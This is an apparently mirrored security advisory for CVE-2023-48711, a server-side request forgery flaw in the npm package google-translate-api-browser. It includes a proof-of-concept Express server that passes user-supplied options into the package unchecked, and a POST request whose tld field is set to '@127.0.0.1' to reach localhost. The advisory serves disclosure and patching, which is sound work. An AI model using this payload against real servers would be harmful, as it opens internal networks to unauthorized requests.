Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS00MjMzLTdxNXEtbTdwNs4AA3Yl
google-translate-api-browser Server-Side Request Forgery (SSRF) Vulnerability
Summary
A Server-Side Request Forgery (SSRF) Vulnerability is present in applications utilizing the google-translate-api-browser
package and exposing the translateOptions
to the end user. An attacker can set a malicious tld
, causing the application to return unsafe URLs pointing towards local resources.
Details
The translateOptions.tld
field is not properly sanitized before being placed in the Google translate URL. This can allow an attacker with control over the translateOptions
to set the tld
to a payload such as @127.0.0.1
. This causes the full URL to become https://[email protected]/...
, where translate.google.
is the username used to connect to localhost.
PoC
Imagine a server running the following code (closely mimicking the code present in the package's README):
const express = require('express');
const { generateRequestUrl, normaliseResponse } = require('google-translate-api-browser');
const https = require('https');
const app = express();
app.use(express.json());
app.post('/translate', async (req, res) => {
const { text, options } = req.body;
const url = generateRequestUrl(text, options);
https.get(url, (resp) => {
let data = '';
resp.on('data', (chunk) => {
data += chunk;
});
resp.on('end', () => {
res.json(normaliseResponse(JSON.parse(data)));
});
}).on("error", (err) => {
console.log("Error: " + err.message);
});
});
const port = 3000;
app.listen(port, () => {
console.log(`Server is running on port ${port}`);
});
An attacker can then send the following POST request to /translate
:
POST /translate HTTP/1.1
Host: localhost:3000
Content-Type: application/json
Content-Length: 51
{"text":"Hello","options": {"tld": "@127.0.0.1"} }
This will cause a request to be sent to the localhost of the server running the Node application.
Impact
An attacker can send requests within internal networks and the local host. Should any HTTPS application be present on the internal network with a vulnerability exploitable via a GET call, then it would be possible to exploit this using this vulnerability.
Permalink: https://github.com/advisories/GHSA-4233-7q5q-m7p6JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00MjMzLTdxNXEtbTdwNs4AA3Yl
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Low
Classification: General
Published: 12 months ago
Updated: 12 months ago
CVSS Score: 3.7
CVSS vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
Identifiers: GHSA-4233-7q5q-m7p6, CVE-2023-48711
References:
- https://github.com/cjvnjde/google-translate-api-browser/security/advisories/GHSA-4233-7q5q-m7p6
- https://nvd.nist.gov/vuln/detail/CVE-2023-48711
- https://github.com/cjvnjde/google-translate-api-browser/commit/33c2eac4a21c6504409e7b06dd16e6346f93d34b
- https://github.com/advisories/GHSA-4233-7q5q-m7p6
Blast Radius: 7.2
Affected Packages
npm:google-translate-api-browser
Dependent packages: 6Dependent repositories: 86
Downloads: 24,641 last month
Affected Version Ranges: < 4.1.0
Fixed in: 4.1.0
All affected versions: 1.0.0, 1.0.1, 1.0.2, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.1.5, 1.1.6, 1.1.7, 1.1.41, 1.1.42, 1.1.43, 1.1.44, 1.1.45, 1.1.46, 1.1.47, 1.1.51, 1.1.52, 1.1.53, 1.1.71, 1.1.511, 1.1.512, 1.1.521, 2.0.0, 2.1.0, 3.0.0, 3.0.1, 4.0.0, 4.0.1, 4.0.2, 4.0.3, 4.0.4, 4.0.5, 4.0.6
All unaffected versions: 4.1.0, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.1.6, 4.1.7, 4.1.8, 4.1.9, 4.2.0, 4.2.1, 4.2.2, 4.2.3, 4.2.4, 4.2.7, 4.3.0, 4.3.1, 4.3.2, 5.0.0